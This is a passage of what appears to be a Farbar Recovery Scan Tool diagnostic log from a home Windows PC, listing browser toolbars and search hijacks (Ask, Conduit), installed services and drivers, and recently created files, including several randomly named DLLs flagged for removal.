http://search.conduit.com/Results.aspx?ctid=CT3323878&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=4&UP=SP1B2D0F91-D6D0-4410-902F-EED2BE72CC0B&q={searchTerms}&SSPV= SearchScopes: HKCU - SuggestionsURL_JSON http://suggest.search.conduit.com/CSuggestJson.ashx?prefix={searchTerms} SearchScopes: HKCU - {01D17C2A-FD50-4CE9-B069-076D6DF7C0A5} URL = https://www.google.com/search?q={searchTerms} SearchScopes: HKCU - {09CE4A42-A9A2-49DD-A0E0-06D95FCBB159} URL = http://www.search.ask.com/web?tpid=ORJ-ST-SPE&o=APN11460&pf=V7&p2=^BE6^OSJ000^YY^US&gct=&itbv=12.16.2.54&apn_uid=1F10A509-ADE8-4C22-8355-BB14ED0C6DA0&apn_ptnrs=BE6&apn_dtid=^OSJ000^YY^US&apn_dbr=ie_11.0.9600.17280&doi=2014-09-17&trgb=IE&q={searchTerms}&psv=&pt=tb BHO: Shopping App by Ask -> {4F524A2D-5354-2D53-5045-7A786E7484D7} -> C:\Program Files\AskPartnerNetwork\Toolbar\ORJ-ST-SPE\Passport.dll (APN LLC.) BHO: Ask Toolbar -> {4F524A2D-5637-4300-76A7-7A786E7484D7} -> C:\Program Files\AskPartnerNetwork\Toolbar\ORJ-V7C\Passport.dll (APN LLC.) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation) Toolbar: HKLM - Ask Toolbar - {4F524A2D-5637-4300-76A7-7A786E7484D7} - C:\Program Files\AskPartnerNetwork\Toolbar\ORJ-V7C\Passport.dll (APN LLC.) Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) Toolbar: HKLM - Shopping App by Ask - {4F524A2D-5354-2D53-5045-7A786E7484D7} - C:\Program Files\AskPartnerNetwork\Toolbar\ORJ-ST-SPE\Passport.dll (APN LLC.) Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation) Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 FireFox: ======== FF ProfilePath: C:\Users\Nikki\AppData\Roaming\Mozilla\Firefox\Profiles\zlrlv7md.default FF SelectedSearchEngine: Google FF Homepage: https://www.google.com/?gws_rd=ssl FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_152.dll () FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation) FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation) FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.) FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.) FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2014-03-08] Chrome: ======= CHR HomePage: Default -> FD2CDB8F12BBBE701DB84B78126884CB69BD9F81538EA0F5E6E30AB95EF6433F CHR DefaultSearchKeyword: Default -> E9A44F1AD69990680DA158AFFDC8E360E82408F199F222DF9436CB027365880C CHR DefaultSearchURL: Default -> 1FD560904E47B2C529B14DD7DC7181515BE594723CF5014D573428705F485C23 CHR CustomProfile: C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Docs) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-08-18] CHR Extension: (Google Drive) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-08-18] CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-08-19] CHR Extension: (YouTube) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-08-18] CHR Extension: (Google Search) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-08-18] CHR Extension: (Google Wallet) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-08-18] CHR Extension: (Gmail) - C:\Users\Nikki\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-08-18] ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 APNMCP; C:\Program Files\AskPartnerNetwork\Toolbar\apnmcp.exe [166296 2014-08-29] (APN LLC.) R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX86\OfficeClickToRun.exe [1626800 2014-07-31] (Microsoft Corporation) R2 Credential Vault Host Control Service; C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostControlService.exe [826272 2010-10-25] (Broadcom Corporation) R2 Credential Vault Host Storage; C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostStorageService.exe [32160 2010-10-25] (Broadcom Corporation) R2 dcpsysmgrsvc; C:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe [388464 2011-01-20] (Dell Inc.) R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe [1337752 2013-09-12] (ESET) R2 IDriveE Service; C:\IDrive\IDriveE Service.exe [157128 2011-11-21] (Pro Softnet Corporation) R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation) R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2010-01-18] (Hewlett-Packard) [File not signed] R2 O2FLASH; C:\Windows\system32\DRIVERS\o2flash.exe [72296 2010-02-10] (O2Micro International) R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2010-01-18] (Hewlett-Packard) [File not signed] R2 ReflectService.exe; C:\Program Files\Macrium\Reflect\ReflectService.exe [605168 2014-02-19] (Paramount Software UK Ltd) R2 RosettaStoneDaemon; C:\Program Files\RosettaStoneLtdServices\RosettaStoneDaemon.exe [1646608 2012-06-19] (Rosetta Stone Ltd.) S3 SecureStorageService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Secure Storage Manager\SecureStorageService.exe [1477632 2010-11-03] (Wave Systems Corp.) [File not signed] R2 STacSV; C:\Program Files\IDT\WDM\STacSV.exe [274514 2011-01-24] (IDT, Inc.) S2 tcsd_win32.exe; C:\Program Files\NTRU Cryptosystems\NTRU TCG Software Stack\bin\tcsd_win32.exe [1629696 2010-07-13] () [File not signed] R2 TdmService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe [2337136 2011-03-04] (Wave Systems Corp.) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R3 Acceler; C:\Windows\System32\DRIVERS\Accelern.sys [43888 2010-12-13] (ST Microelectronics) R3 BTWAMPFL; C:\Windows\System32\DRIVERS\btwampfl.sys [300584 2014-02-18] (Broadcom Corporation.) R3 cvusbdrv; C:\Windows\System32\Drivers\cvusbdrv.sys [33832 2010-08-24] (Broadcom Corporation) R3 e1cexpress; C:\Windows\System32\DRIVERS\e1c6232.sys [358224 2012-08-10] (Intel Corporation) R1 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [188808 2013-09-17] (ESET) R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [134248 2013-09-17] (ESET) R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [122376 2013-09-17] (ESET) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [23256 2014-05-12] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-09-24] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [51928 2014-05-12] (Malwarebytes Corporation) S3 MEI; C:\Windows\system32\drivers\HECI.sys [41088 2010-10-19] (Intel Corporation) R3 NETwNs32; C:\Windows\System32\DRIVERS\NETwNs32.sys [7434240 2010-12-21] (Intel Corporation) S3 nusb3hub; C:\Windows\system32\drivers\nusb3hub.sys [62208 2010-11-19] (Renesas Electronics Corporation) S3 nusb3xhc; C:\Windows\system32\drivers\nusb3xhc.sys [141568 2010-11-19] (Renesas Electronics Corporation) R1 nvkflt; C:\Windows\System32\DRIVERS\nvkflt.sys [208672 2013-12-04] (NVIDIA Corporation) R0 nvpciflt; C:\Windows\System32\DRIVERS\nvpciflt.sys [27936 2013-12-04] (NVIDIA Corporation) R3 O2MDFRDR; C:\Windows\System32\DRIVERS\O2MDFxp.sys [60192 2011-01-04] (O2Micro ) S3 O2MDRRDR; C:\Windows\system32\drivers\O2MDRw7.sys [62440 2011-01-04] (O2Micro ) R3 O2SDJRDR; C:\Windows\System32\DRIVERS\o2sdjvst.sys [63976 2011-03-23] (O2Micro ) R0 PBADRV; C:\Windows\System32\DRIVERS\PBADRV.sys [26608 2008-06-04] (Dell Inc) R0 pssnap; C:\Windows\System32\DRIVERS\pssnap.sys [16504 2013-06-28] (Macrium Software) S3 ST7007; C:\Windows\system32\drivers\ST7007.sys [62576 2011-06-20] (STMicroelectronics) R0 stdcfltn; C:\Windows\System32\DRIVERS\stdcfltn.sys [17648 2010-08-20] (ST Microelectronics) S3 tcm; C:\Windows\system32\drivers\tcm.sys [12952 2009-04-17] () ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-24 03:55 - 2014-09-24 03:57 - 00000000 ____D () C:\FRST 2014-09-24 03:07 - 2014-09-24 03:39 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-09-24 03:06 - 2014-09-24 03:06 - 00001066 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware 2014-09-24 03:06 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-09-24 03:06 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-09-24 03:06 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-09-24 02:45 - 2014-09-24 02:45 - 00003288 ____N () C:\bootsqm.dat 2014-09-24 02:20 - 2014-03-04 05:17 - 00868352 _____ (Microsoft Corporation) C:\ProgramData\wsesfqh.dll 2014-09-24 02:20 - 2013-08-28 21:50 - 01289096 _____ (Microsoft Corporation) C:\ProgramData\qwypnms.dll 2014-09-23 23:00 - 2014-09-23 23:00 - 00048640 _____ () C:\Windows\system32\wosyw.dll 2014-09-23 23:00 - 2014-09-23 23:00 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-09-23 23:00 - 2014-09-23 23:00 - 00000000 _____ () C:\Windows\system32\xitpi.dll 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ___RD () C:\Program Files\Skype 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ____D () C:\Program Files\Common Files\Skype 2014-09-21 02:27 - 2014-09-21 02:27 - 00049673 _____ () C:\Users\Nikki\Documents\SAB2.pptx 2014-09-21 00:09 - 2014-09-21 01:58 - 00044040 _____ () C:\Users\Nikki\Documents\SAB.pptx 2014-09-17 19:37 - 2014-09-17 19:37 - 00004477 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log 2014-09-17 19:37 - 2014-09-17 19:37 - 00000000 ____D () C:\Program Files\Common Files\Java 2014-09-16 21:29 - 2014-09-16 21:29 - 00157639 _____ () C:\Users\Nikki\Documents\Spanish II 2.05.wma 2014-09-14 19:05 - 2014-09-14 19:05 - 00001351 _____ () C:\Users\Nikki\Desktop\Sticky Notes.lnk 2014-09-14 02:22 - 2014-09-24 00:24 - 00042462 _____ () C:\Users\Nikki\Documents\TTI IP.pptx 2014-09-13 23:35 - 2014-09-17 13:17 - 00592384 _____ () C:\Users\Nikki\Documents\rectangle2.pptx 2014-09-13 21:56 - 2014-09-13 21:57 - 00153088 _____ () C:\Users\Nikki\Documents\rectangle1.pptx 2014-09-13 13:06 - 2014-08-19 13:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2014-09-13 13:06 - 2014-08-18 18:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-09-13 13:06 - 2014-08-18 18:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-09-13 13:06 - 2014-08-18 17:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-09-13 13:06 - 2014-08-18 17:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2014-09-13 13:06 - 2014-08-18 17:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2014-09-13 13:06 - 2014-08-18 17:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2014-09-13 13:06 - 2014-08-18 17:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2014-09-13 13:06 - 2014-08-18 17:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2014-09-13 13:06 - 2014-08-18 17:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-09-13 13:06 - 2014-08-18 17:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-09-13 13:06 - 2014-08-18 17:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2014-09-13 13:06 - 2014-08-18 17:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2014-09-13 13:06 - 2014-08-18 17:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2014-09-13 13:06 - 2014-08-18 17:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2014-09-13 13:06 - 2014-08-18 17:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2014-09-13 13:06 - 2014-08-18 17:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2014-09-13 13:06 - 2014-08-18 17:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-09-13 13:06 - 2014-08-18 17:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2014-09-13 13:06 - 2014-08-18 17:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2014-09-13 13:06 - 2014-08-18 17:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-09-13 13:06 - 2014-08-18 17:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-09-13 13:06 - 2014-08-18 17:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-09-13 13:06 - 2014-08-18 17:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-09-13 13:06 - 2014-08-18 17:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-09-13 13:06 - 2014-08-18 17:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2014-09-13 13:06 - 2014-08-18 17:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2014-09-13 13:06 - 2014-08-18 16:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-09-13 13:06 - 2014-08-18 16:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-09-13 13:06 - 2014-08-18 16:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2014-09-13 13:06 - 2014-06-26 21:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll 2014-09-11 22:09 - 2014-07-06 21:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll 2014-09-11 22:09 - 2014-07-06 21:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll 2014-09-11 22:09 - 2014-06-23 22:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll 2014-09-11 22:08 - 2014-09-04 21:52 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll 2014-09-11 22:08 - 2014-09-04 21:47 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll 2014-09-11 22:08 - 2014-08-01 07:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll 2014-09-10 19:50 - 2014-09-10 21:09 - 00048347 _____ () C:\Users\Nikki\Documents\!.pptx 2014-09-08 14:16 - 2014-09-08 14:16 - 00031357 _____ () C:\Users\Nikki\Documents\kh.pptx 2014-09-08 00:01 - 2014-09-08 00:01 - 00363678 _____ () C:\Users\Nikki\Documents\FW2.pptx 2014-09-07 17:08 - 2014-09-07 17:08 - 00376320 _____ () C:\Users\Nikki\Documents\FW.pptx 2014-09-05 12:30 - 2014-09-05 17:59 - 02697294 _____ () C:\Users\Nikki\Documents\USH 1.05H.pptx 2014-09-03 21:19 - 2014-09-03 21:19 - 00630206 _____ () C:\Users\Nikki\Documents\English II 1.04(2).pptx 2014-09-03 12:29 - 2014-09-03 12:29 - 00000000 ____D () C:\Users\Nikki\Documents\Bluetooth Exchange Folder 2014-08-30 21:23 - 2014-09-03 21:19 - 00630231 _____ () C:\Users\Nikki\Documents\English II 1.04.pptx 2014-08-29 13:56 - 2014-08-29 13:56 - 00005844 _____ () C:\Users\Nikki\Documents\Algebra II 1.05 Grid.ggb 2014-08-28 11:16 - 2014-08-22 21:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll 2014-08-28 11:16 - 2014-08-22 20:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-24 03:57 - 2014-09-24 03:55 - 00000000 ____D () C:\FRST 2014-09-24 03:56 - 2009-07-14 00:34 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-09-24 03:56 - 2009-07-14 00:34 - 00030896 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-09-24 03:46 - 2010-11-20 17:01 - 00782470 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-09-24 03:39 - 2014-09-24 03:07 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-09-24 03:39 - 2014-08-18 12:26 - 00000880 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cfbb013a16b54f.job 2014-09-24 03:39 - 2014-04-01 14:01 - 00000000 ____D () C:\IDrive 2014-09-24 03:38 - 2014-05-20 22:47 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job 2014-09-24 03:38 - 2014-02-18 18:07 - 01728290 _____ () C:\Windows\WindowsUpdate.log 2014-09-24 03:38 - 2010-11-20 17:48 - 00161328 _____ () C:\Windows\PFRO.log 2014-09-24 03:38 - 2009-07-14 00:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-09-24 03:38 - 2009-07-14 00:52 - 00000000 ____D () C:\Windows\twain_32 2014-09-24 03:38 - 2009-07-14 00:39 - 00042432 _____ () C:\Windows\setupact.log 2014-09-24 03:37 - 2014-08-18 12:32 - 00000886 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfbb01ef80f922.job 2014-09-24 03:06 - 2014-09-24 03:06 - 00001066 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-09-24 03:06 - 2014-09-24 03:06 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware 2014-09-24 03:05 - 2014-03-08 02:28 - 00000000 ____D () C:\_Installs 2014-09-24 02:45 - 2014-09-24 02:45 - 00003288 ____N () C:\bootsqm.dat 2014-09-24 00:24 - 2014-09-14 02:22 - 00042462 _____ () C:\Users\Nikki\Documents\TTI IP.pptx 2014-09-23 23:00 - 2014-09-23 23:00 - 00048640 _____ () C:\Windows\system32\wosyw.dll 2014-09-23 23:00 - 2014-09-23 23:00 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage 2014-09-23 23:00 - 2014-09-23 23:00 - 00000000 _____ () C:\Windows\system32\xitpi.dll 2014-09-23 21:55 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\system32\NDF 2014-09-22 13:13 - 2014-03-08 06:50 - 00000000 ____D () C:\Users\Nikki\AppData\Roaming\Skype 2014-09-22 12:52 - 2014-03-08 16:42 - 00000000 ____D () C:\Users\Nikki\Documents\Personal 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ___RD () C:\Program Files\Skype 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2014-09-22 11:51 - 2014-09-22 11:51 - 00000000 ____D () C:\Program Files\Common Files\Skype 2014-09-22 11:51 - 2014-03-08 06:50 - 00002503 _____ () C:\Users\Public\Desktop\Skype.lnk 2014-09-22 11:51 - 2014-03-08 06:50 - 00000000 ____D () C:\ProgramData\Skype 2014-09-21 02:27 - 2014-09-21 02:27 - 00049673 _____ () C:\Users\Nikki\Documents\SAB2.pptx 2014-09-21 01:58 - 2014-09-21 00:09 - 00044040 _____ () C:\Users\Nikki\Documents\SAB.pptx 2014-09-17 21:07 - 2014-03-08 16:42 - 00000000 ____D () C:\Users\Nikki\Documents\myss 2014-09-17 19:40 - 2014-03-08 04:19 - 00000000 ____D () C:\ProgramData\Oracle 2014-09-17 19:37 - 2014-09-17 19:37 - 00004477 _____ () C:\Windows\system32\jupdate-1.7.0_67-b01.log 2014-09-17 19:37 - 2014-09-17 19:37 - 00000000 ____D () C:\Program Files\Common Files\Java 2014-09-17 19:37 - 2014-03-08 04:22 - 00000000 ____D () C:\Program Files\Java 2014-09-17 13:17 - 2014-09-13 23:35 - 00592384 _____ () C:\Users\Nikki\Documents\rectangle2.pptx 2014-09-16 22:53 - 2014-03-08 16:43 - 00000000 ____D () C:\Users\Nikki\Documents\Spanish I 2014-09-16 21:29 - 2014-09-16 21:29 - 00157639 _____ () C:\Users\Nikki\Documents\Spanish II 2.05.wma 2014-09-15 09:06 - 2014-03-08 02:24 - 00231568 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2014-09-14 20:51 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\Microsoft.NET 2014-09-14 19:38 - 2014-03-08 04:14 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe 2014-09-14 19:38 - 2014-03-08 04:14 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl 2014-09-14 19:05 - 2014-09-14 19:05 - 00001351 _____ () C:\Users\Nikki\Desktop\Sticky Notes.lnk 2014-09-13 21:57 - 2014-09-13 21:56 - 00153088 _____ () C:\Users\Nikki\Documents\rectangle1.pptx 2014-09-13 13:06 - 2014-03-08 16:21 - 00000000 ____D () C:\Windows\system32\MRT 2014-09-13 13:04 - 2014-04-30 16:45 - 00000000 ___SD () C:\Windows\system32\CompatTel 2014-09-13 13:04 - 2014-03-08 16:21 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2014-09-11 22:11 - 2014-08-18 12:27 - 00002135 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-09-10 21:09 - 2014-09-10 19:50 - 00048347 _____ () C:\Users\Nikki\Documents\!.pptx 2014-09-10 17:08 - 2014-08-19 09:53 - 00118076 _____ () C:\Users\Nikki\Documents\English II Pace Chart.xlsx 2014-09-08 14:16 - 2014-09-08 14:16 - 00031357 _____ () C:\Users\Nikki\Documents\kh.pptx 2014-09-08 00:01 - 2014-09-08 00:01 - 00363678 _____ () C:\Users\Nikki\Documents\FW2.pptx 2014-09-07 17:08 - 2014-09-07 17:08 - 00376320 _____ () C:\Users\Nikki\Documents\FW.pptx 2014-09-05 17:59 - 2014-09-05 12:30 - 02697294 _____ () C:\Users\Nikki\Documents\USH 1.05H.pptx 2014-09-04 21:52 - 2014-09-11 22:08 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll 2014-09-04 21:47 - 2014-09-11 22:08 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll 2014-09-03 21:20 - 2014-04-09 16:54 - 01536000 ___SH () C:\Users\Nikki\Documents\Thumbs.db 2014-09-03 21:19 - 2014-09-03 21:19 - 00630206 _____ () C:\Users\Nikki\Documents\English II 1.04(2).pptx 2014-09-03 21:19 - 2014-08-30 21:23 - 00630231 _____ () C:\Users\Nikki\Documents\English II 1.04.pptx 2014-09-03 12:29 - 2014-09-03 12:29 - 00000000 ____D () C:\Users\Nikki\Documents\Bluetooth Exchange Folder 2014-09-03 12:28 - 2014-03-08 04:08 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service 2014-09-03 12:28 - 2009-07-14 00:33 - 00321192 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-08-30 18:01 - 2009-07-13 22:37 - 00000000 ____D () C:\Windows\rescache 2014-08-30 14:54 - 2014-04-03 16:48 - 00000000 ____D () C:\Program Files\Mozilla Firefox 2014-08-29 13:56 - 2014-08-29 13:56 - 00005844 _____ () C:\Users\Nikki\Documents\Algebra II 1.05 Grid.ggb 2014-08-29 11:48 - 2014-03-08 02:40 - 00000000 ____D () C:\Program Files\Microsoft Office 15 Files to move or delete: ==================== C:\ProgramData\qwypnms.dll C:\ProgramData\wsesfqh.dll Some content of TEMP: ==================== C:\Users\Nikki\AppData\Local\Temp\APNSetup.exe C:\Users\Nikki\AppData\Local\Temp\emsxocl.dll C:\Users\Nikki\AppData\Local\Temp\Foxit Reader Updater.exe C:\Users\Nikki\AppData\Local\Temp\InstHelper.exe C:\Users\Nikki\AppData\Local\Temp\MSNCDCB.exe 